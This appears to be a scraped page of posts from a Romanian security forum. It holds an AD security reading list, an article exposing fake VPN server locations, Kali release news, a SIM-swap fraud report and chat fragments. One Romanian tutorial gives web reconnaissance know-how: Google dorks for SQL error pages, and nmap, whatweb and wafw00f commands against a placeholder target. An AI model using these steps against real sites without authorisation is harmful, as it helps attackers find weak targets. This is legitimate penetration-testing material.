Logs Kerberos Golden Ticket Protection Mitigating Pass-the-Ticket on Active Directory Overview of Microsoft's "Best Practices for Securing Active Directory" The Keys to the Kingdom: Limiting Active Directory Administrators Protect Privileged AD Accounts With Five Free Controls The Most Common Active Directory Security Issues and What You Can Do to Fix Them Event Forwarding Guidance Planting the Red Forest: Improving AD on the Road to ESAE Detecting Kerberoasting Activity Security Considerations for Trusts Advanced Threat Analytics suspicious activity guide Protection from Kerberos Golden Ticket Windows 10 Credential Theft Mitigation Guide Detecting Pass-The- Ticket and Pass-The- Hash Attack Using Simple WMI Commands Step by Step Deploy Microsoft Local Administrator Password Solution Active Directory Security Best Practices Finally Deploy and Audit LAPS with Project VAST, Part 1 of 2 Windows Security Log Events Talk Transcript BSidesCharm Detecting the Elusive: Active Directory Threat Hunting Preventing Mimikatz Attacks Understanding "Red Forest" - The 3-Tier ESAE and Alternative Ways to Protect Privileged Credentials AD Reading: Active Directory Backup and Disaster Recovery Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques Hunting For In-Memory .NET Attacks Mimikatz Overview, Defenses and Detection Trimarc Research: Detecting Password Spraying with Security Event Auditing Hunting for Gargoyle Memory Scanning Evasion Planning and getting started on the Windows Defender Application Control deployment process Preventing Lateral Movement Using Network Access Groups How to Go from Responding to Hunting with Sysinternals Sysmon Windows Event Forwarding Guidance Threat Mitigation Strategies: Part 2 – Technical Recommendations and Information License To the extent possible under law, Rahmat Nurfauzi "@infosecn1nja" has waived all copyright and related or neighboring rights to this work. Sursa: https://github.com/infosecn1nja/AD-Attack-Defense

Ce vrei sa anveti despre internetzi?

Oldie but goldie Free download: Buy:

Multumiri dl Quo. On a side-note, WTF? https://imgur.com/kizVf7N

Do VPNs really have all the servers they claim in exotic locations all over the world? In many cases, the answer is no. The true location of some VPN servers may be entirely different. In other words, a server that is allegedly in Pakistan is actually in Singapore. Or a server that should be in Saudi Arabia is actually in Los Angeles, California. (Both are real examples from below.) This is known as spoofing the true location. Why is this important? First, the performance may suffer if the actual server is significantly further away. Second, it’s bad if you are trying to avoid certain countries (such as the UK or US) where the server may be located. Third, customers aren’t getting the true server locations they paid for. And finally, using fake server locations raises questions about the VPN’s honesty. In this article we’ll take a deep dive into the topic of fake VPN server locations. The point here is not to attack any one VPN provider, but instead to provide honest information and real examples in order to clarify a confusing topic. We will cover four main points: VPN server marketing claims Fake server locations with ExpressVPN (11 are identified) Fake server locations with PureVPN (5 are identified, but there are many more) How to test and find the true location of VPN servers But before we begin, you might be asking yourself, why do VPNs even use fake server locations? The incentives are mainly financial. First, it saves lots of money. Using one server to fake numerous server locations will significantly reduce costs. (Dedicated premium servers are quite expensive.) Second, advertising numerous server locations in a variety of countries may appeal to more people, which will sell more VPN subscriptions. Here’s how that works… My, what a larger server network you have! Most of the larger VPN providers boast of server networks spanning the entire world. This seems to be the trend – they are emphasizing quantity over quality. Take Hidemyass for example and their server network claims: If you think there are physical servers in 190+ countries, I have a bridge to sell you! Upon closer examination of Hidemyass’s network, you find some very strange locations, such as North Korea, Zimbabwe, and even Somalia. But reading further, it becomes clear that many of these locations are indeed fictitious. Hidemyass refers to these fictitious server locations as “virtual locations” on their website. Unfortunately, I could not find a public server page listing all server URLs, so I could not test any of the locations. However, the Hidemyass chat representative I spoke with confirmed they use “virtual” locations, but could not tell me which locations were fake and which were real. PureVPN is another provider that admits to using fake locations, which they refer to as “virtual servers” – similar to Hidemyass. (We will take a closer look at PureVPN below, with testing results for the servers that are not classified as virtual.) ExpressVPN also boasts of a large server network. Unlike with PureVPN and Hidemyass, ExpressVPN does not admit to using fake locations anywhere on its website. The ExpressVPN chat representative I spoke with claimed that all server locations were real. (This was proven through testing to be false.) Testing shows that many of ExpressVPN’s server locations are fake. Just like with Hidemyass and PureVPN, testing results show that ExpressVPN is using fictitious server locations, which we will cover in detail below. Testing VPN server locations With free network-testing tools, you can quickly find the true location of a VPN server. This allows you to cross-check dubious server locations with a high degree of accuracy. For every VPN server examined in this article, I used three different network-testing tools to verify the true location beyond any reasonable doubt: CA App Synthetic Monitor ping test (ping test from 90 different worldwide locations) CA App Synthetic Monitor traceroute (tests from various worldwide locations) Ping.pe (ping test from 24 different worldwide locations) First, I used this ping test, which pings the VPN server from 90 different worldwide locations. This allows you to narrow down the location with basic triangulation. In general, the lower the time (ms), the closer the server is to a given location. Pretty simple and accurate. Second, I ran traceroutes from various locations based on the results in the first test. This allows you to measure the distance along the network to the final VPN server. With ExpressVPN, for example, I could run a traceroute from Singapore and find that the VPN server is about 2 ms away, which means it is also located in Singapore. Third, I used another ping test to again ping the VPN server from different worldwide locations. This tool also includes traceroutes for each location (MTR). Note: When running traceroutes or ping tests, you may have some outlier test results due to different variables with the network and hops. That’s why I recommend running multiple tests with all three of the tools above. This way, you will be able to eliminate outlier results and further confirm the true server location. With every fictitious server location found in this article, all three tools strongly suggested the exact same location. If there was any doubt, I did not label the server as “fake” below. ExpressVPN server locations As we saw above, ExpressVPN boasts a large number of servers on their website in some very interesting locations. In the map below you can see many of their southeast Asia server locations in red boxes. These are all the locations that were determined to be fictitious after extensive testing, with the actual server being located in Singapore. Every ExpressVPN server location in a red box was found to be fake after extensive testing. ExpressVPN does not make any of their server URLs publicly available. So to obtain the server URL, you need to have an ExpressVPN account, then go into the member area and download the manual configuration files. In total, I found 11 fake VPN server locations with ExpressVPN. Below I will show you the test results for one location (Pakistan). You can find the the other test results in the Appendix to this article. ExpressVPN’s Pakistan server (Singapore) URL: pakistan-ca-version-2.expressnetw.com Test 1: Ping times from different worldwide locations reveals the server is much closer to Singapore than to Bangalore, India. If the server was truly in Pakistan, this would not make much sense. … At only 2 milliseconds ping (distance), this “Pakistan” server is without a doubt in Singapore. But to further prove the location, we can run a few more tests. Test 2: Running a traceroute from Singapore to the “Pakistan” VPN server, we can once again verify that this server is in Singapore, at about 2 ms ping. Looking at every hop in the traceroute gives you the full picture of the network path. This shows how much distance (time) is between the final VPN server and the traceroute location. At around 2 ms, this server is clearly in Singapore. Just for fun, we will run one more test, even though it is already clear where the server is located. Test 3: Here is another ping test using the website ping.pe. The Pakistan server location is undoubtedly fictitious (spoofed). The real location is in Singapore. One other sign you see with ExpressVPN’s fake server locations is the second-to-last server IP address (before the final hop) when you run the traceroute is the same. With all the fake server locations in Asia you find this IP address before the final hop: 174.133.118.131 With a traceroute you can see that the final (spoofed) server is always very close to the IP address above. This is simply more evidence pointing to the obvious conclusion that Singapore is the true location of all these servers. In addition to Pakistan, here are the other fictitious server locations found with ExpressVPN: Nepal Bangladesh Bhutan Myanmar Macau Laos Sri Lanka Indonesia Brunei Philippines Note: there may be more fake locations, but I did not have time to test every server. Update: Six days after publishing this article ExpressVPN has admitted to numerous fake locations on its website (mirror) – 29 fictitious locations in total. Just like PureVPN and Hidemyass, ExpressVPN refers to these as “virtual” server locations. PureVPN server locations PureVPN has quite a few fake server locations. On the PureVPN server page you find that many of the servers begin with “vl” which seems to stand for “virtual location”. You find two different types of these prefixes: vleu (which probably stands for virtual location Europe) and vlus (which likely means virtual location US). Every “vl” location I tested was indeed fake (or “virtual” as they like to call it). But I also found that many of their non-virtual locations are also fake, such as Aruba and Azerbaijan in the screenshot above. Here is one example: PureVPN’s Azerbaijan server (United Kingdom) URL: az1-ovpn-udp.pointtoserver.com The ping test clearly shows this server location to be in the United Kingdom – in close proximity to Edinburgh. Furthermore, the ping times for Turkey (which is close to Azerbaijan) are much higher than the UK. The server location is already clear; it is located in the UK. But to further verify the location beyond doubt, I ran a traceroute from Edinburgh, UK to the “Azerbaijan” server: At around 2 milliseconds, this server is without a doubt in the United Kingdom, not Azerbaijan. In addition to Azerbaijan, I also found four other fake “non-vl” server locations with PureVPN: Aruba Saudi Arabia Bahrain Yemen Note: I did not spend much time testing PureVPN server locations because it was clear that many locations were fake. Consequently, I only chose five examples for this article. How to find the real VPN server location Determining the real location of a VPN server is quick and easy with the five steps below. Step 1: Obtain the VPN server URL or IP address You should be able to find the URL or IP address of the VPN server in the members area. You may need to download the VPN configuration file for the specific location, and then just open the file and get the URL for the server. Some VPNs openly provide this information on their server page. Here I downloaded the OpenVPN configuration file for the ExpressVPN Nepal server. After opening the file, I find the server URL near the top. Now copy the URL of the VPN server for step 2. Step 2: Ping the VPN server from different worldwide locations Use this free tool from CA App Synthetic Monitor to ping the VPN server from about 90 different worldwide locations. Enter the VPN server URL (or IP address) from step 1 into the box and hit Start. It will take a few seconds for the ping results to show. Step 3: Examine results to determine actual location Now you can examine the results, looking for the lowest ping times to determine the closest server. You may want to have a map open to examine which server should have the lowest ping based on geographical distance. From all of the testing locations, Bangalore, India should have the lowest ping due to its close proximity to Nepal. But if you look at all the results, you may find that the exact location of the server is somewhere else. Looks like we have a winner. This VPN server is located in Singapore – NOT Nepal. At this point it is clear that the server location is in Singapore, and not Nepal (for this example). But just to verify these results, we will run some more tests. Step 4: Run a few traceroute tests You can further probe the exact location by running a traceroute test. This is simply a way to measure the time it takes for a packet of data to arrive at the server location, across the different hops in the network. There are different options for traceroute testing, such as the Looking Glass from Hurricane Electric. My preferred method is to use this traceroute tool from CA App Synthetic Monitor and then select the location to run the traceroute from. First, you can run the traceroute from a location that should be the closest to the server location. In this case, that would be New Delhi, which is the closest location I can find to Nepal. Just enter the VPN server URL and select your test location for the traceroute. Now we will run another traceroute, but this time from Singapore. We have a winner: Singapore. It is now clear that this ExpressVPN Nepal server is located in Singapore. But you can also cross check with one more test. Step 5: Run another ping test Just like in step 2, Ping.pe will ping the VPN server from different worldwide locations, allowing you to narrow down the likely location. This tool will continuously ping the server and calculate the average time for every location. Furthermore, it will run traceroutes for every location, allowing you to further verify the location. As before, simply enter the VPN server URL and hit Go. The ping results will continuously populate in the chart. Once again, the results clearly show this server is in Singapore. No doubt about it. Now we can see beyond all doubt, this VPN server is located in Singapore, not Nepal. Controlling for variables With every fake server location I found, all three tools strongly suggested the same location. Nonetheless, you may still get some outlier results due to different variables and hops in the network. To control for variables and easily eliminate these outliers, simply run multiple tests with all three tools. You should find the results to be very consistent, all pointing to the same location. Conclusion on fake VPN server locations Dishonesty is a growing problem with VPNs that more people are starting to recognize. From fake reviews to shady marketing tactics, false advertising, and various VPN scams, there’s a lot to watch out for. Fake VPN servers are yet another issue to avoid. Unfortunately with all the deceptive marketing, it can be difficult to find the true facts. Most VPNs emphasize the size of their server network rather than server quality. This quantity over quality trend is obvious with most of the larger VPN providers. On the opposite end of the spectrum are smaller VPN services that have fewer locations, but prioritize the quality of their server network, such as Perfect Privacy and VPN.ac. Some VPN users may not care about fake servers. Nonetheless, fake VPN servers can be problematic if you: are trying to avoid specific countries are trying to optimize VPN performance (which may be affected by longer distances) are trying to access restricted content (fake locations may still be blocked) expect the server to be where the VPN says it is (honesty) With the tools and information in this article, you can easily verify the location of any VPN server, which removes the guesswork completely. Appendix (testing results) ExpressVPN Nepal (Singapore) URL: nepal-ca-version-2.expressnetw.com And now running a traceroute to the “Nepal” server from Singapore: This “Nepal” server is located in Singapore. ExpressVPN Bhutan (Singapore) URL: bhutan-ca-version-2.expressnetw.com And now running a traceroute to the “Bhutan” server from Singapore: Once again, ExpressVPN’s “Bhutan” server is located in Singapore. ExpressVPN Sri Lanka (Singapore) URL: srilanka-ca-version-2.expressnetw.com Here’s the traceroute to the “Sri Lanka” server from Singapore: The “Sri Lanka” server is actually in Singapore. ExpressVPN Bangladesh (Singapore) URL: bangladesh-ca-version-2.expressnetw.com Here’s the traceroute to the “Bangladesh” server from Singapore: It is easy to see that the “Bangladesh” server is located in Singapore, especially when you compare the locations using the ping test. ExpressVPN Myanmar (Singapore) URL: myanmar-ca-version-2.expressnetw.com Here’s the traceroute to the “Myanmar” server from Singapore: This VPN server is located in Singapore (also verified by the other tests). ExpressVPN Laos (Singapore) URL: laos-ca-version-2.expressnetw.com Here’s the traceroute to the “Laos” server from Singapore: This server is also clearly in Singapore. ExpressVPN Brunei (Singapore) URL: brunei-ca-version-2.expressnetw.com Here’s the traceroute to the “Brunei” server from Singapore: Once again, this is clearly in Singapore. But given the close geographic proximity of these locations, I also checked ping times from neighboring countries, such as Malaysia and Indonesia, which were all significantly higher than the ping time from Singapore. All tests pointed to the same conclusion: Singapore. ExpressVPN Philippines (Singapore) URL: ph-via-sing-ca-version-2.expressnetw.com Unlike all of the other fictitious server locations, ExpressVPN appears to be admitting the true location with the configuration file name. Below you see that the config file is named “Philippines (via Singapore)” – which suggests the true location. Here’s the traceroute to the “Philippines” server from Singapore: Just like with all the other traceroute tests, this location is also in Singapore. ExpressVPN Macau (Singapore) URL: macau-ca-version-2.expressnetw.com This was another server location that was very easy to identify as fake using the ping test. Because Hong Kong and Macau are right next to each other, the closest ping result should have been with the Hong Kong server. But instead, Hong Kong’s ping time was about 32 milliseconds and Singapore’s ping time was again around 2 milliseconds. Here is the traceroute to “Macau” from Singapore: Another fake server location, which is clearly in Singapore. ExpressVPN Indonesia (Singapore) URL: indonesia-ca-version-2.expressnetw.com The ping test with this location was another dead giveaway. The ping result from Jakarta, Indonesia was 198 milliseconds, and the ping result from Singapore was under 2 milliseconds. Again, case closed. Here is the traceroute from Singapore: Location: Singapore. PureVPN Aruba (Los Angeles, USA) URL: aw1-ovpn-udp.pointtoserver.com All tests show this server is located in Los Angeles, California (USA). Here is the traceroute from Los Angeles: Actual server location: Los Angeles, California PureVPN Bahrain (Amsterdam, Netherlands) URL: bh-ovpn-udp.pointtoserver.com Here is the traceroute from Amsterdam. This “Bahrain” server is undoubtedly in Amsterdam. PureVPN Saudi Arabia (Los Angeles, USA) URL: sa1-ovpn-udp.pointtoserver.com Now running the traceroute from Los Angeles, California: This “Saudi Arabia” server is in Los Angeles. PureVPN Yemen (Frankfurt, Germany) URL: ym1-ovpn-udp.pointtoserver.com Here’s the traceroute from Frankfurt: PureVPN’s “Yeman” server is clearly in Frankfurt, Germany. UPDATES HideMyAss (November 2017) – As a response, HideMyAss has told us, “We have always been open and transparent about virtual server locations and believe that the concept is explained comprehensively both on our website and in our latest software client.” However, when you examine their server locations page, it is still not clear exactly which locations are “virtual”. ExpressVPN – ExpressVPN has fully updated their server locations page to explain exactly which servers are real and which are “virtual”. They have also removed all contradictory claims about “no logs” and clarified their exact policies. You can check out the details on the ExpressVPN website here. PureVPN – We have not heard anything form PureVPN since this article was first published. However, we did recently learn that PureVPN has been providing connection logs to the FBI while still claiming to have a “zero log policy”. Sursa: https://restoreprivacy.com/vpn-server-locations/

Kali Linux 2019.1 Released — Operating System For Hackers February 18, 2019Swati Khandelwal Wohooo! Great news for hackers and penetration testers. Offensive Security has just released Kali Linux 2019.1, the first 2019 version of its Swiss army knife for cybersecurity professionals. The latest version of Kali Linux operating system includes kernel up to version 4.19.13 and patches for numerous bugs, along with many updated software, like Metasploit, theHarvester, DBeaver, and more. Kali Linux 2019.1 comes with the latest version of Metasploit (version 5.0) penetration testing tool, which "includes database and automation APIs, new evasion capabilities, and usability improvements throughout," making it more efficient platform for penetration testers. Metasploit version 5.0 is the software's first major release since version 4.0 which came out in 2011. Talking about ARM images, Kali Linux 2019.1 has now once again added support for Banana Pi and Banana Pro that are on kernel version 4.19. "Veyron has been moved to a 4.19 kernel, and the Raspberry Pi images have been simplified, so it is easier to figure out which one to use," Kali Linux project maintainers says in their official release announcement. "There are no longer separate Raspberry Pi images for users with TFT LCDs because we now include re4son's kalipi-tft-config script on all of them, so if you want to set up a board with a TFT, run 'kalipi-tft-config' and follow the prompts." The Offensive Security virtual machine and ARM images have also been updated to the latest 2019.1 version. You can download new Kali Linux ISOs directly from the official website or from the Torrent network, and if you are already using it, then you can simply upgrade it to the latest and greatest Kali release by running the command: apt update && apt -y full-upgrade. Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/kali-linux-hackers-os.html

Tin de la inceput sa mentionez ca tutorialul este pentru aplicatii web. De-a lungul timpului am vazut numeroase persoane care, desi aveau cunostinte despre anumite vulnerabilitati web(de ce apar, cum se exploateaza, etc.), nu reuseau sa gaseasca mai nimic in aplicatii web reale. Acest lucru se datoreaza faptului ca au sarit peste o etapa esentiala a unui audit de securitate si anume, Information Gathering. Neavand o metodologie clara si un plan de atac bine stabilit, acestia nu erau in masura sa obtina date suficiente despre aplicatiile pe care le analizau iar ca urmare a acestui lucru nu reuseau sa identifice vulnerabilitatile. In acest tutorial vom discuta despre care sunt informatiile de care avem nevoie despre tinta si cum le putem afla astfel incat sa ne maximizam rezultatele. Asa cum spuneam la inceputul acestui tutorial, Information Gathering este etapa initiala a oricarui audit de securitate IT care poate face diferenta dintre succes si esec. Prin aceastea, pentesterul incearca sa obtina toate informatiile posibile despre tinta folosindu-se de diferite servicii (motoare de cautare, diferite utilitare, etc.). Intrucat nu exista un model standard, fiecare pentester este liber sa isi construiasca propria metodologie astfel incat rezultatele sa fie cat mai bune. In cele ce urmeaza voi prezenta modul in care obisnuiesc eu sa abordez o tinta atunci cand realizez un audit de securitate. 1.Motoarele de cautare Primul lucru pe care trebuie sa il faci este sa cauti informatii prin intermediul motoarelor de cautare folosindu-te de diferiti operatori de cautare. Astfel poti obtine subdomeniile, diferite fisiere, tehnologiile folosite de aplicatia web si chiar unele vulnerabilitati. Exemplu: diferite subdomenii ale yahoo.com Cei mai folositori operatori ai motorului de cautare Google sunt: site: - acest operator permite afisarea rezultatelor doar de pe un anumit domeniu si este extrem de folositor pentru descoperirea subdomeniilor. Exemplu: site:*.yahoo.com filetype: sau ext: limiteaza rezultatele afisand doar paginile care au o anumita extensie si pot fi folosite pentru a descoperi tehnologiile folosite in dezvoltarea aplicatiei web. Exemplu: site:*.yahoo.com ext:php – am limitat rezultatele cautarii la subdomeniile yahoo.com care au fisiere .php intext:<termen> limiteaza rezultatele afisand doar paginile in care se regaseste termenul specificat si poate fi folosit pentru a descoperi diferite vulnerabilitati. Exemplu: site:targetwebsite.com intext:”You have an error in your SQL syntax” site:targetwebsite.com intext:”Microsoft OLE DB Provider for SQL Server” site:targetwebsite.com intext:”Microsoft JET Database Engine” site:targetwebsite.com intext:”Type mismatch” site:targetwebsite.com intext:”Invalid SQL statement or JDBC” site:targetwebsite.com intext:”mysql_fetch_array()” site:targetwebsite.com intext:”mysql_” operatori logici: Google accepta anumiti operatori logici care de cele mai multe ori sunt foarte folositori. De exemplu, putem exclude din rezultate anumite subdomenii folosind operatorul - . Astfel, site:.yahoo.com -site:games.yahoo.com va returna subdomeniile yahoo.com, mai putin rezultatele care au legatura cu games.yahoo.com. Mai multe informatii despre operatorii de cautare pentru Google gasesti aici si aici. Pe langa motoarele de cautare obsnuite ca Google, Bing, Yahoo etc., foloseste si: Censys - Foarte folositor in descoperirea subdomeniilor Exemplu: https://www.censys.io/certificates?q=parsed.subject.organization%3A%22Yahoo%22 Shodan 2. Determinarea tehnologiilor folosite La acest pas va trebuie sa verifici daca: aplicatia web este protejata de vreun Web Application Firewall (WAF) Cel mai simplu mod prin care poti face acest lucru este folosind wafw00f: $ python watw00f2.py http://www.targetwebsite.com aplicatia web foloseste un Content Management System (CMS) open-source (Wordpress, Joomla, Drupal, etc.) Poti verifica acest lucru folosind whatweb, cms-explorer, CMSmap. $ whatweb -a 3 http://targetwebsite.com $ cms-explorer.pl -url http://targetwebsite.com/ -type wordpress Urmatorul pas consta in identificarea sistemului de operare, al tipului de WebServer (Apache, IIS) folosit de tinta si versiunea acestora. Daca versiunile celor doua sunt outdated, cel mai probabil exista cateva vulnerabilitati cunoscute (CVE) in acele produse. Poti descoperi acest lucru cu o simpla cautare pe http://cvedetails.com . Exemplu: Vulnerabilitatile cunoscute pentru Apache 2.3.1 Determinarea sistemului de operare se poate realiza foarte simplu folosind nmap. $ nmap -sV -O www.targetwebsite.com Metodele prin care poti identifica versiunea Webserver-ului sunt: Analizand output-ul cererilor HTTP care folosesc metoda HEAD, OPTIONS sau TRACE Raspunsul HTTP al unei cereri care foloseste una din metodele de mai sus va contine, de cele mai multe ori, si headerul Server. Analizand pagina de eroare 404 Folosind httprecon / httprint . Un alt aspect important il constituie tehnologia server-side folosita de tinta. Cel mai simplu mod in care aceasta poate fi descoperita este urmarind extensiile fisierelor. De exemplu, daca URL-ul tintei este http://targetwebsite.com/index.php , este clar ca aplicatia web a fost scrisa in limbajul PHP. Alte extensii specifice tehnologiilor server-side sunt: .py – Python .rb – Ruby .pl – Perl .php / .php3 / .php4 / .php5 / .phtml / .phps – PHP .asp – Active Server Pages (Microsoft IIS) .aspx – ASP+ (Microsoft .NET) .asmx – ASP.NET WebServer .cfm – ColdFusion .cfml – Cold Fusion Markup Language .do – Java Struts .action – Java Struts .jnpl – Java WebStart File .jsp – Java Server Page .nsf – Lotus Domino server In cazul in care extensiile nu sunt vizibile in URL, poti identifica tehnologia server-side folosita analizand cookie-ul pe care aplicatia web il seteaza. Exemplu: PHPSESSID=12355566788kk666l544 – PHP De asemenea, iti poti da seama daca o aplicatie web este scrisa in PHP si prin intermediul unui Easter Egg. Daca adaugi codul ?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 la finalul unui URL iar in pagina apare o imagine amuzanta inseamna ca aplicatia respectiva a fost dezvoltata folosind PHP. Bineinteles, acest Easter Egg poate fi dezactivat din php.ini. Mai multe informatii gasesti aici. 3. Identificarea fisierelor aplicatiei web La acest pas nu trebuie decat sa accesezi cat mai multe pagini alte aplicatiei web, fara a face nimic altceva. Viziteaza fiecare pagina insa nu uita sa conectezi browserul la Burp Suite pentru a se crea site-map-ul aplicatiei web. Astfel vei avea o evidenta mult mai clara asupra fisierelor pe care urmeaza sa le testezi. Foloseste Burp Spider pe langa navigarea manuala pentru a descoperi cat mai multe fisiere. PS: verifica daca exista fisierul robots.txt Dupa ce consideri ca ai navigat suficient printre fisierele aplicatiei web, trebuie sa descoperi fisierele ascunse. Exista numeroase aplicatii care te pot ajuta: Dirbuster Functia Discover Content a aplicatiei BurpSuite Wfuzz Patator Burp Intruder Liste de cuvinte pentru scripturile de mai sus: fuzzdb gitDigger svnDigger SecLists Urmatorul pas este sa iei la rand fiecare fisier gasit si sa incerci sa intelegi cum functioneaza aplicatia web respectiva. Pentru a-ti fi mai usor sa iti dai seama unde ar putea exista o vulnerabilitate, pune-ti urmatoarele intrebari: 1. In fisierul pe care il testezi, continutul se modifica in mod dinamic in functie de anumite criterii (valoarea unui parametru din URL, cookie, user agent etc.) ? Mai exact, este posibil ca in acel fisier aplicatia web sa foloseasca informatii dintr-o baza de date? Daca da, testeaza in primul rand pentru vulnerabilitatile de tip injection (SQL, XPATH, LDAP, etc.) insa nu neglija celelalte tipuri de vulnerabilitati. S-ar putea sa ai surprize. 2. Poti controla in vreun fel continutul paginii? Ceilalti utilizatori pot vedea datele pe care le introduci tu? Daca da, testeaza in special pentru vulnerabilitati de tip Cross Site Scripting si Content Spoofing. 3. Aplicatia web poate interactiona cu alte fisiere? Daca da, testeaza in special pentru Local File Inclusion. 4. In fisierul respectiv exista functii care necesita nivel sporit de securitate (cum ar fi formular de schimbare al emailului/parolei etc.)? Daca da, testeaza in special pentru Cross Site Request Forgery. Nu uita sa testezi fiecare parametru al fiecarui fisier pe care l-ai descoperit.

Pe mine m-au exmatriculat, fmm, calculam chimie

^ fugi ma, la zerourile acelea nici nu-i tre ads, in primul rand.. Ce banda ai ma? Metropolitana? Ce naiba...ai banda si ceri de la noi

Tre sa spuo doar "da" sau "doch", call center man, sa te stoarca de bani

There were 28 transactions from his account, the businessman said, but he was not notified as his SIM card had been blocked by those behind the fraud. Story Highlights A suspected case of SIM card swapping led to the fraud The businessman says he received six missed calls before the fraud A case has been registered with the cybercrime wing Mumbai: A suspected case of SIM card swapping has led to a Mumbai-based textile businessman losing Rs 1.86 crore from his bank account. A case has been registered with the cybercrime wing of the Mumbai Police. The businessman, whose identity is not being revealed, says he received six missed calls on his mobile phone between 11.44 pm and 1.58 am on December 27-28, after which the fraud took place. Cyber experts call it the "SIM swap", in which criminals gain access to the data and use the OTP that is required to transfer funds. SIM swap is a relatively new and technologically advanced form of fraud that allows hackers to gain access to bank account details, credit card numbers, and other personal data. The businessman says he became suspicious when he noticed six missed calls on his phone. Two were from the UK. When he realized his phone had stopped working, he approached the service provider who informed him that the SIM card had been blocked on his request the previous night. "I was informed that I had put in a request to block my SIM around 11.15 pm on December 27. I disputed that as I had not put in any request to block the SIM card. After this, the service provider issued a new SIM card which was activated on the evening of December 29," the businessman said. There were 28 transactions from his account, he said, but he was not notified as his SIM card had been blocked by those behind the fraud. The businessman says he realised that he had been robbed when one of his employees approached the bank for a fund transfer and was told that the account was overdrawn. The businessman said, "On checking the accounts we found that there were 28 transactions transferring money to almost 15 different accounts. None of these transactions were initiated by us and the money wasn't transferred to accounts we transfer funds regularly to." Deputy Commissioner of Police Akbar Pathan told reporters, "We have received a complaint that around ₹ 1.86 crore has been transferred from his current account. The criminals had his bank credentials and phone number. We want to tell people that if your phone is blocked without consent, please get it reactivated immediately and inform the police if you notice fraudulent transactions." Via https://www.ndtv.com/mumbai-news/how-6-missed-calls-left-mumbai-businessman-robbed-off-rs-1-86-crore-1972131?amp=1&amp;akamai-rum=off

Hai ccca se face troll, zbori @Cheater API e scris de tine?

E ok..

// solved

Am furat bani de pe cardul tatalui meu si imi este frica ca o sa ma prinda, ajuta-ma Dumnezeu sa trec oeste asta cu bine si promit ca nu o sa mai fac, jur pe inima mea 😭